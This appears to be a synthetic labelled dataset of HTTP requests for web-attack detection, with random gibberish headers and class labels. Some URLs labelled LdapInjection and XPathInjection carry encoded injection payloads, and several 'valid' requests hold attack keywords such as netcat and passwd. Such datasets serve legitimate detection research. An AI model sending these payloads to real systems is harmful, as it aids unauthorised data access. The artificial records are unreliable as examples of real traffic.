Cookie2: $Version="689"
Date: Sat, 01 Dec 07 24:37:11 UTC
ETag: "@cv6kveJUQ8NUddH"
Expect: tMoo
From: sMew@IhehlCaold.be
If-Modified-Since: Thu, 17 Aug 06 04:34:27 UTC
If-Unmodified-Since: Mon, 02 Oct 06 15:38:28 CET
If-Match: "r1y4XSoHH6hIiIU6BYyj"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM dWVPc1hsN3p3c2VUc3FXaG9FdGlnd2RuZTRlVWRsdGF0Zm90b2E=
Authorization: rcones hmNr=htGqa
Range: 9314-,96-
Referer: http://www.1hmvpein.cz/ttoaaebi.swf
TE: deflate;q=0.3,trailers
Trailer: TE
User-Agent: Mozilla/5.0 (compatible; lwh4aaA; Unix; ieiioe; eznl)
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4979x0191
Via: 8.5 www.bMtp.jpeg, FTP/8.9 184.203.216.214
Transfer-Encoding: oahe
Upgrade: psuwtu/8.0, Nemih/3.2, owog/3.0, rc2iey/0.5
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 2994
Start - Id: 37728
class: LdapInjection
GET /lSgx1hG9/7id8I0eit/io3sNtoNa4stgioezurh/gswtes/GKgWC/ekxR0v.laYVBN/hv7Sft-gdE2Mq4/IeannIaEvanh/nprne5sianmw/sedlJtt6/kAfrYb10tnpPyfS8zoEI.asp?zEuqiehrpttou=sSRIn34Zo&vs=491%29%28%26%28objectClass%3Dsha%29%28%7C%28sn++++%3Di9x%29%28cn%3Dokaa++J*%29%29&BqQrEC=6&Mfvtcmre=ajawhZ&3y=oinpP2uEitowu&0ieeiRra0eipSte=ienINKHcwnf&ututbt3ewie1en=6%2FhRe HTTP/1.0
Host: 193.168.180.28
Connection: zcviFoo
Accept: audio/*, text/*, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=33
Client-ip: 44.160.29.148
Cookie: cersofamt=nxUB;Uwindow.openMy=4655;eijbohzciupeg='-8zr:Ro~t;6kpliemRnnei=ns%udsv4hk
Cookie2: $Version="0"
Date: Mon, 01 Mar 04 23:05:28 GMT
ETag: "Ulrvtu2pQE785CphD"
Expect: fniL
From: Iiydrs@AboeNOsxe.biz
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Mon, 24 Oct 05 02:00:30 UTC
If-Match: *
If-None-Match: "Uiyb@bS.YoXfsZ-.97w"
If-Range: Mon, 29 Jun 09 20:15:45 CET
Max-Forwards: 51
Pragma: no-cache
Authorization: Kd7eo9 pola=hbxen
Referer: http://pnfA.it/lims/rohysf.php3
Trailer: From
User-Agent: toeraaehshbel
UA-CPU: x86
Via: ape/0.9 209.174.31.101
Transfer-Encoding: compress
Upgrade: nTlw/9.1, 5snom/2.5, ayto7e/8.7, h3rd/9.0
Warning: 812 www.dOsiefc.htm "lm4se" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37728
Start - Id: 25508
class: Valid
GET /rnCaE4G/rI@9u/fumaySj/snjLno/s8KJojfShB/hLUi_56e.pl?Oes6nhnihacar=D0txlthtewokon&aivxU=09&crtnLdto9w=yh6retlIvgo&tSzezCzqw9ueas=%27sep&gyPH=mE%7Cah3ucatrtoEi9&ytacsr=96552089&s0ittoinse5gs=100&h9acEsmealpEhta=1&C2copyAQ=9&Ubrsnwro=childtev%27Tr&noEn=Tfsfiesn&dhuriywqcooaBt=nldaLtethtacces%3Df%25netcat%28%7Cb%3Ce&ZpositionwRUyJh=wed%5D&1euswyI0f=xFoo6d9dwafnem18 HTTP/1.0
Host: www.2sspa7o.com
Connection: close
Accept: */*
Accept-Charset: gb2312, iso-2022-kr, big5, iso-8859-3;q=0.8, euc-kr
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: xmn=yax
Client-ip: 9.66.121.144
Cookie: th3Aheo=0320364;2weobu6eop9=]ia%OneOzly;7Sno9ht=2;4B6T=osaor;up3ujO=710343;wdgiXgucuo9u=aQxZZ22hVs
Cookie2: $Version="47"
Date: Fri, 07 Nov 08 13:09:33 UTC
ETag: W/"Yb_tx9yG@Ad7Oyq"
Expect: sbmi=uoUl7
From: hhexy@ieecah.it
If-Modified-Since: Thu, 13 Oct 05 18:50:59 CET
If-Unmodified-Since: Tue, 15 Feb 05 03:26:36 GMT
If-Match: "2q@qaS4CUBqb82R"
If-None-Match: "UpW9V12Yu2HxC.QGj@E"
If-Range: *
Max-Forwards: 51
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM aWF0YWxzbmVtZ3EwZWl1MG5waXR3YXJkaXBIbm0wc3RuYmJhcnNlYnJjYg==
Authorization: taig8A Cbyatts=nl1l
Range: 1-
Referer: /irneCt3J.cfm
TE: trailers,gzip,chunked
Trailer: Authorization
User-Agent: intshmbestnsiTq3ma
UA-CPU: x86
UA-Disp: 0020,943,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: 4.4 www.O1og.htm
Transfer-Encoding: deflate
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 52901908993086938619
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25508
Start - Id: 21685
class: Valid
GET /l9yWyeJpVlJVUGLW/ZgipEallX/20mt3Ouu0iat/nwiOsaw8wotccndeoi/7.Si/taTDVTp5rHT.png?fttbcm=bJdY%404&CZKOjNgas=%3Cinsertnz&rankMnzOhj=0462&urIl=s0v5E HTTP/1.0
Host: www.nksre7ehg.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 109.102.250.114
Cookie: spo1=fx-i;etyh3dgaeb6=0;ao13aapzFh2e=668;rl04=3421;3hykthe=01790
Cookie2: $Version="044"
Date: Tue, 01 Aug 06 23:45:11 UTC
ETag: W/"Dv1uMP8Hv4QitlIlBLDW"
Expect: suti=AmRw
From: hrhe@thdtgL.uk
If-Modified-Since: Wed, 14 Jan 04 04:56:28 GMT
If-Unmodified-Since: Tue, 11 Sep 07 09:03:11 UTC
If-Match: "gCmYjnv@kNFnA3dnHZ"
If-None-Match: "HKfL5-tEfHfLMstF"
If-Range: *
Max-Forwards: 6640
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: zlkAcr cnfcci=ifhphtEe
Authorization: Sswxei oeiwd=oTeio
Range: 773-66462,33280-473765
Referer: /atxh/rdte.php3
TE: trailers
Trailer: If-Match
User-Agent: EbLB (eogzgWecx; bXM3nGn)
UA-CPU: StrongARM
UA-Disp: 6270,1333,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 414x682
Via: FTP/4.7 www.ttaio5fp.html, FTP/3.1 www.eUsetoal.tiff:80, FTP/7.5 www.ee6ErRV.html
Transfer-Encoding: deflate
Upgrade: bukar/2.4, adstf/8.4, heanto/5.6
Warning: 604 www.tas1nyu.js "Uehtn0hm2ptete" 
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21685
Start - Id: 6681
class: Valid
POST /l10TunCAQlS/enCvdC31@Mq5T1tcXI_.html? HTTP/1.0
Content-Length: 267
Content-Language: vp
Content-Encoding: compress
Content-Location: http://www.ltwacv.gov/dltz/sdtrdude/diphrc/svotv.css
Content-MD5: N2hOdWlueWlyZ3JlYXNuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 23:24:58 UTC
Last-Modified: Tue, 04 Aug 09 22:59:24 CET
Host: www.Wmahee.cz
Connection: hcniijl
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pAcnwbdj-eyhicogg;q=0.8, e8r-secfve;q=0.6, trhemdu0-eih, 6H9iteno-dz;q=0.2, te9d7ae-nCtd
Cache-Control: max-age=7
Client-ip: 177.176.36.93
Cookie: tsirsheadm=meL3u@;uxr0=nPO
Cookie2: $Version="165"
Date: Sun, 08 Aug 04 24:59:05 GMT
ETag: W/"hP64pnhEM96LTvD"
Expect: otntth=tlnunhit
From: R5anodt@eiRwb.com
If-Modified-Since: Fri, 01 Dec 06 12:02:36 GMT
If-Unmodified-Since: Fri, 23 Jul 04 09:13:36 UTC
If-Match: "20zeabnk5OL3nWet@"
If-None-Match: *
If-Range: *
Max-Forwards: 531
MIME-Version: 9.9
Pragma: bwtyh='nos'
Proxy-Authorization: Basic dW51dGVlOmFuaHJ5
Authorization: Basic cXNyY254dDphZHR5
Range: -70
Referer: /5wail8de.js
TE: trailers,trailers,deflate;q=0.2
Trailer: Accept-Language
User-Agent: 2zd3v5XU0 http://www.emghIacu.fr
UA-CPU: Sparc
UA-Disp: 8391,040,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 075x397
Via: 7.1 www.aiolic.png, HTTP/5.0 www.conygdgn.jpeg, HTTP/9.0 www.OrhsfAr.gif:9
Transfer-Encoding: compress
Upgrade: tuerio/7.1, 9oaf/9.3
Warning: 490 164.192.138.202 "mmabac8fuum" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

notemc0iiy=u&jrnevroSedR=2918&oeemwsdta=iiscriptald=&mdtoi2ds=noD9ms82jmxu&sD_having_9UYrhavingw=8287&aredh3Dnwgo=lnhnOtaa&rce4ehnat=4E3rR&84UhKS4=eihtas&ibeeIpm=rac8l&eoY4trr=723&9ialu=080284&TeH=786888&e7h=h includeo&@Pke=t@b :imoGtr|hrLorhh&t9asrke=0197783

End - Id: 6681
Start - Id: 2825
class: Valid
GET /cM1JJWUGVfhrC2/nIdbc7t8vF4ukFtlw/rIldDNbhlXj/tZ1RD.1Q4/xUv78NBd9@tTwP_/Id8/uippLw/l5xR/AKXobject5NyEn4KY/oda_EBexOk5/linknPBabN-Qo/tzvSa4BzXR.htm?lsmh=lj6bNx47258&dy8fHtht4_=05bB&Lris=ed6ts5nbs8nsotr3&odhEoeafaepoz=tijeMt&nexdiramiorp=uimgcis0nuRoadifr&eriiquleprajeR=%24Ukry5%3DyIdeli%7Ehos&tG=435701&eokml0ioishigg=69vdyoaAhet4smo&gbpd=5&eonbjirro=auhetwomikaslwngte&t3ihcTots8s=e%24location&Rd2AZy=oscript+o&hoalm=6 HTTP/1.1
Host: 231.13.51.147:80
Connection: close
Accept: video/*;q=0.4, text/*, text/*
Accept-Charset: windows-1251;q=0.8, x-mac-korean, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: eci7-8T3fwln, TdVsn2ip-emaIr;q=0.9, hneshd-n3in, ah-stlI;q=0.2
Cache-Control: max-age=5
Client-ip: 128.156.51.190
Cookie: cDeeefatdmite=u4yEs tta5ft10;cbm=5460488
Cookie2: $Version="3"
Date: Mon, 13 Nov 06 07:56:53 CET
ETag: "hcNaxx7E@Au@DR0w"
Expect: Nxkt
From: amctiaa@rubrn.net
If-Modified-Since: Sun, 05 Oct 08 11:20:59 GMT
If-Unmodified-Since: Wed, 03 Sep 08 13:01:43 UTC
If-Match: "GQIGhKoPCWpmC.-7bJ0"
If-None-Match: *
If-Range: Thu, 03 Sep 09 05:04:15 CET
Max-Forwards: 0060
MIME-Version: 8.2
Pragma: tiieiel=enerus
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: NTLM bzM4bmgzVGh0bHlhaXJhZHRlc2U1YzNlRGxiOWFhOGlpdHFhY2Vj
Range: -648
Referer: /aNn25kid/aeast/sgretua/a8a8.tar.gz
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: tcgseu0s/6.7.2
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: 6.6 192.92.16.249, 0.2 www.ruurcpt.png:93, 7.7 193.70.170.142
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 8694580923107
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2825
Start - Id: 17105
class: Valid
GET /vbscript-usrLAWE7/RMUVY8A/cegFn8oy3ughlahnkc/atdcCssWiqIeylfoghe/e4hlossOoewn9eFpc.sh?d9r0FMChttp=02296439&3eeysveiT=3563223328&ty55=Er&Etaoepar3oo6ef=where&htDdstehtsbb=bwindow.open&ntnageeUZ=otelrae3ho53i&eiop=oi&n2saL=497542 HTTP/1.1
Host: 109.232.221.0
Connection: close
Accept: image/gif, application/postscript;q=0.1, video/quicktime;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=09
Client-ip: 53.27.195.117
Cookie: ineocmaS95ya=37;hithm=5
Cookie2: $Version="7"
Date: Wed, 18 Apr 07 05:26:37 GMT
ETag: W/"bP5Ox600qbTCA@DWsP"
Expect: 100-continue
From: rujdrFrL@e4s1eoon.net
If-Modified-Since: Sat, 03 Jan 09 04:34:13 CET
If-Unmodified-Since: Fri, 04 Mar 05 02:05:05 CET
If-Match: *
If-None-Match: "ywN7vPakVP_2qpU@x-"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.7
Pragma: a=tlvabns
Proxy-Authorization: NTLM NGdydGhxaGlFZnJlZW9ub2x1ZUNzc3dubnNvUmxuZnMybWg5aTN0cjZkaXQ=
Authorization: Basic bGVpbGN1bXM6ZWxhbXVQbg==
Range: 0171-,862462-35
Referer: /gsneeton.jpeg
TE: trailers,gzip;q=0.0
Trailer: Accept
User-Agent: Mozilla/4.3 (Windows; U; Win98 9.8; rn-nv; rv:3.7.2) Gecko/15927879
UA-CPU: PowerPC
UA-Disp: 553,514,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: 1.2 170.165.1.30, Apnro/2.4 46.215.149.109, 6.7 101.188.78.178
Transfer-Encoding: gzip
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 816 www.eedo.htm "sdali2e4bw" 
X-Forwarded-For: 22.117.12.85
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17105
Start - Id: 8848
class: Valid
GET /s4vGV/fpihnhwsaNOa/RfnelneiORA8bI7gI6/piz3inse/2vHvt0Wdrop/DeThtb9cLaIe8a/ngnG/thSsgmsanumwnesenG/tak.tULpDiIhYAb8Y6.shtml?djsyoDisre85A9=fbn5ay&nen=261&esdxseesemO=1190&td3dm=60481753&zteiutona=oR0lexecnedeletelrlbxp_O&n3o=sre+u+ftrarlc&ih=tRAEx86k&DFVCpasswdDuQ=9&uuhQveA=zincludefs&4tn=uame0tacu&l6L2MQHy7=uoo4m6tm HTTP/1.1
Host: 91.100.205.116
Connection: close
Accept: image/jpeg
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 149.37.95.36
Cookie: lirleyya1a=jntsb;rsna=xEt nae[T nwqa;KvncC-qs=839849;mo8ynte=yUnsohRnitieaeewo;yrS8nu7968z=asimseraRzpliaw3e;dn0dssxvh6=c;tmpt-
Cookie2: $Version="67"
Date: Sat, 26 Dec 09 16:15:23 GMT
ETag: W/"95MocJfVdQq6DGH"
Expect: 100-continue
From: tE1la@7oon.cz
If-Modified-Since: Thu, 23 Apr 09 09:22:14 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:50:53 GMT
If-Match: *
If-None-Match: "S65JCG-9SvA01JX9P"
If-Range: Mon, 14 Feb 05 10:46:49 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest cnonce="fhsros9"
Range: -30581,78717-03
Referer: /nl2gee/ttc1Hdid.png
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/4.7 (X11; U; SunOS sun4u 0.1; na-na; rv:4.6.7) Gecko/98509273
UA-CPU: x86
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 186x0429
Via: FTP/8.6 235.173.45.134, 6.1 www.8fD3nafe.htm:62
Transfer-Encoding: tNxih
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 456 www.uhuAsrn.gif "Tmaadr" "Thu, 06 Jan 05 11:04:37 CET"
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8848
Start - Id: 31438
class: Valid
GET /rX2B69WgL/oGIaCoDKzuvUxWgUnWvV/sGWydDa47wke7UhkB-sZ/kJEl-0A2BJ2JB/dCTe6detaghoad/usrU_gRZjZOo.GHDT/nRpgUcFsuE41jtv.jpg?ee=eE%2FI&th=egrBclzVBAU&qosikie=eqOaDQuEv&4P5gb=tgtki3qorioazeffle&n6bstR=il+&GfzE=z&7ooodaheuIe=ojzn&onfeeeie=r%3Dh6 HTTP/1.1
Host: 114.172.97.2
Connection: dewe3d
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.8, iso-8859-15;q=0.3, iso-8859-5;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: saiplmoc-e, Aern-sytrn, wis8hede-0cts
Cache-Control: Sht='0k'
Client-ip: 188.240.135.226
Cookie: toa=2eobdsxEpy86k;catHEI=nai1eeE2Eo;BPRG0DMD=3;ufP9bS=guEc6orT& rshyg7sock_streama;45replaceoZR=0Ts_sz@eD;L5eY_R=7vuo
Cookie2: $Version="471"
Date: Fri, 05 Dec 08 17:58:11 CET
ETag: W/".7BiS1g@7A@OIIL-E"
Expect: houb4s
From: vconid@sswn.net
If-Modified-Since: Fri, 24 Nov 06 20:48:38 GMT
If-Unmodified-Since: Thu, 30 Dec 04 24:50:32 CET
If-Match: "-urq-6-RIsqW8MVuIi"
If-None-Match: *
If-Range: Mon, 15 May 06 18:46:03 UTC
Max-Forwards: 8719
MIME-Version: 2.0
Pragma: um=3
Proxy-Authorization: hchos tglefect=mpumcNne
Authorization: Basic YXNtMTA6SWhzMGE1bHQ=
Range: -77880
Referer: /e9ws3at.php3
TE: gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: 2jEus7jfm7 http://www.r06Ao.fr
UA-CPU: PowerPC
UA-Disp: 887,1676,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4140x395
Via: 9.9 www.KroeG.htm:299
Transfer-Encoding: compress
Upgrade: Ydta/8.0, aai/3.3, 2eoey/4.9, eyfn/6.3
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 6456862151016
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31438
Start - Id: 38478
class: LdapInjection
GET /Eaderemesrs/dJZlinkKdKm7@/frsayf@Fp/ye/te3ietde5.gif?vt9gtipm5tgea=telnetr&ZXFv94deleteua=lib9+iaermoosr8alr%5Du&naotsUs2a1oc=35164&xGOjzh4y=111087&idmf=tEicLaWba%5D&diLs=83%29%28%26%28objectClass%3Dyed%29%28%7C%28sn++%3D+ps%29%28cn%3Dtpd++J*%29%29&e1ovtoa=fElaH3&O.uMkV8andcVinput=350652 HTTP/1.1
Host: www.k0EHy.uk
Connection: hils
Accept: audio/*;q=0.2, audio/basic, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: SnentReU-n0Ryo
Cache-Control: no-transform
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="51"
Date: Sat, 18 Jun 05 13:51:07 UTC
ETag: W/"HdLDJ1hGjmZABeS"
Expect: stre=tmrfue
From: b8antatt@o1neid.cz
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Mar 09 18:48:59 UTC
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: esla smd48=NgmS0io
Range: 24-,76759-,-19589
Referer: /Iwuuooe/diet.pdf
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: iekOret/9.8.3
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0403x7270
Via: 8.9 www.yaeGoc2o.css, HTTP/0.0 106.245.37.16, HTTP/1.8 95.86.164.120
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38478
Start - Id: 35669
class: XPathInjection
GET /uioXaG_eJ/brKllM/enRy.E/K7aHnull/AfrommB/onaDbtnasdme9iiecn.pl?4e8Yt1eHhnhrltu=ir%27%5D+++%7C+++++P++++%7C+++%2F%2Fuser%5B+++++name%2Ftext%28++++%29++++%3D++%27lxt&lrJ6LYE_4d=iUiu5ZXd%40P&StXY0=46Ximg&ldaarosimdntsw=nEytBawuoih&0y9JsvYpasswdgNG=j%26&HT.bQq=46612446&a7eoe=e%2F&tgs=a%27oAs1mocharoAflh&Sd4=1ei++&aa=du%27e&8ezrmyaoarotgn=nposition%5Dtot&eushi=goiquH&mcgc0ufhiohi=t%29n&ir=rup HTTP/1.0
Host: 112.145.37.150:80
Connection: keep-alive
Accept: image/gif;q=0.5
Accept-Charset: iso-8859-9;q=0.5, iso-8859-6, cp-950
Accept-Encoding: gzip;q=0.2, gzip;q=0.0
Accept-Language: awsn-e, pu-na2ril;q=0.9, ea-asw6s
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: aTygnhvjmoabe=9342679;ednrnuen3hwF=8gie;lhd=a0YCeH
Cookie2: $Version="890"
Date: Fri, 08 May 09 17:47:22 UTC
ETag: "e3pjb@j9ocdjkSZAayeI"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 08 Oct 09 16:38:14 UTC
If-Unmodified-Since: Mon, 27 Apr 09 16:38:08 GMT
If-Match: "lhLroghqAgPbvy9_4"
If-None-Match: "TcZuF_-osidmp9Dh@NG"
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 0084
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: Basic YWUwcjpIdE5tZTl5
Range: -5103
Referer: /mbnrndd/2noseoo/Idmioiw/nyeMu.wmn
TE: trailers,gzip;q=0.0
Trailer: User-Agent
User-Agent: c9i1rpii/3.3.4
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: usna/0.3 www.stumf.jpeg, 7.6 www.htle0ei.gif:9
Transfer-Encoding: compress
Upgrade: alcth4/9.0, omen/8.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35669
Start - Id: 25751
class: Valid
GET /AstdinzYFaOCE/KTF/uRau8oagbrnxco/eh5ncyTCgyaxvCdoz/pKABwHNb/mecho2G7@W22z/t8grhfalltaie1qHu.jpeg?aerlb5Hoauma4u=8976935&1r=schinnheTumoy&YWDpasswdH9KAN8=ed3uv4&ohlra=2405951&3Edmdmhslur=yimdrr&iohasm9diEo5xnt=5577&ariI=h8ho&vNd=3094593360&fetteh=%3Etlocationx HTTP/1.1
Host: 230.18.122.125:80
Connection: close
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.9, identity;q=0.0, identity;q=0.7, compress;q=0.2
Accept-Language: ym6wsba-Syiaa, 3-cn5aaon;q=0.0, rrsaio-hojm3th;q=0.0, t5Osh-sFsarj;q=0.5
Cache-Control: no-store
Client-ip: 231.14.230.156
Cookie: lif=arr9dstdinctea@h;uuooattwh=0155807741;pten9pi9eset=19625
Cookie2: $Version="38"
Date: Mon, 23 Nov 09 14:59:10 CET
ETag: "0zoPlb3v_hszAj8-"
Expect: 100-continue
From: Fisonn33@rmkNOgAs.ch
If-Modified-Since: Sat, 15 Oct 05 21:40:39 CET
If-Unmodified-Since: Fri, 06 Aug 04 23:39:44 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Dec 06 06:56:14 UTC
Max-Forwards: 712
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YXNTNjNlaG1hZWZmc2FDZTZhczR3aXJhNm13c25hYW9uaWlydGgza2Fz
Authorization: Basic YXJvaGI6b2xleWpO
Range: 5458-41874
Referer: http://18da.cz/e6csSTe.gif
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (compatible; MSIE 1.4; Solaris; ehnpnzer; ch0seeioh; tsoitey)
UA-CPU: x86
UA-Disp: 7894,3200,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6588x200
Via: 5.3 186.179.17.174, 6.0 87.55.152.250
Transfer-Encoding: gzip
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 019 www.crdaky7H.htm:4 "ktng2aWa3" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 960628745817709
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25751
Start - Id: 6412
class: Valid
POST /ikM4UA/yAnqsufbtrs9/bgdt/libeTvG@window.open/xEo.jsp? HTTP/1.0
Content-Length: 126
Content-Language: acseeo
Content-Encoding: compress
Content-Location: /rstw2b.php
Content-MD5: ZHVtdGFyOTh3Z2UwdWhlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Oct 07 15:34:23 GMT
Last-Modified: Fri, 24 Oct 08 05:42:11 UTC
Host: 5.249.240.72
Connection: wdeoe2ac
Accept: image/*;q=0.5, audio/basic;q=0.5, application/*;q=0.6
Accept-Charset: iso-8859-9
Accept-Encoding: deflate, gzip, deflate;q=0.2
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 100.70.40.171
Cookie: we33eEe=|t8o;fttoefewE7L=6258338;ie4nb5c=2;kddhxl=n$oath;c8cGRXH=+;rte0xwaehfDl=sivscriptt(a4e8vshttp 
Cookie2: $Version="208"
Date: Tue, 06 Jan 04 21:55:59 GMT
ETag: W/"pFZSSxq5juv@EXUw"
Expect: 100-continue
From: hqRji@tsgE6aiH.biz
If-Modified-Since: Thu, 17 Nov 05 02:34:28 GMT
If-Unmodified-Since: Sun, 24 Jul 05 08:42:38 CET
If-Match: *
If-None-Match: "3fT.pS2g40Czf-ZrIXC"
If-Range: Tue, 22 Apr 08 20:38:35 CET
Max-Forwards: 4498
MIME-Version: 4.1
Pragma: n1wmlt=aiahaa
Proxy-Authorization: Basic ZmsxYW5sWWU6ZG94SWxiZXQ=
Authorization: Digest username="heldOne"
Range: -46641,596587-2635,975-1
Referer: /7Y30g07/7se5naq/2bta/ogot/u2Dc2t.jsp
TE: gzip,deflate
Trailer: TE
User-Agent: ecteee/0.6.3.8.8
UA-CPU: Sparc
UA-Disp: 1399,3420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4815x4543
Via: roit/3.7 www.i4e0.html
Transfer-Encoding: compress
Upgrade: ono/3.8, nsbim/3.9, sx9l/5.2, i6neu6/4.3
Warning: 180 207.135.2.209 "isphidore0tsNylnohr" 
X-Forwarded-For: 179.22.131.83
X-Serial-Number: 45754151629
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

3eeoib=hniuqp2eycme&s4kkctb=69&boeafi7=ieatj&u85ssier8=ieindRa&pRetzxe2judc=56836&nh=2634819&tkfe=us&hr=92731&oetonstnv=400717

End - Id: 6412
Start - Id: 7848
class: Valid
POST /sfl4iOhrr/56lRnjdeme/48jopHbMh1NUf7/23_ylocationTXsamS8./OIde/rSAcatXronTauh/X1sn2OvTVT-sPq/kremScomz5g/gcJvUsaZPgXH8y/7HlaImntacvdteaiee.png? HTTP/1.1
Content-Length: 178
Content-Language: ri0,hdsh,rgEnei
Content-Encoding: gzip
Content-Location: /hoEaswTT.bin
Content-MD5: OTVjYWxPRmlJb052cDNzeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jun 04 20:51:39 UTC
Last-Modified: Mon, 09 Jul 07 14:56:22 GMT
Host: 16.139.115.104
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Sa6a-faapctm;q=0.7
Cache-Control: only-if-cached
Client-ip: 25.240.253.117
Cookie: RQ=8605802
Cookie2: $Version="71"
Date: Fri, 06 Feb 04 12:12:10 CET
ETag: W/"e77md6hlpvMtQ8mAtgl"
Expect: eReoosil
From: rnda3N@eUsEnd.cz
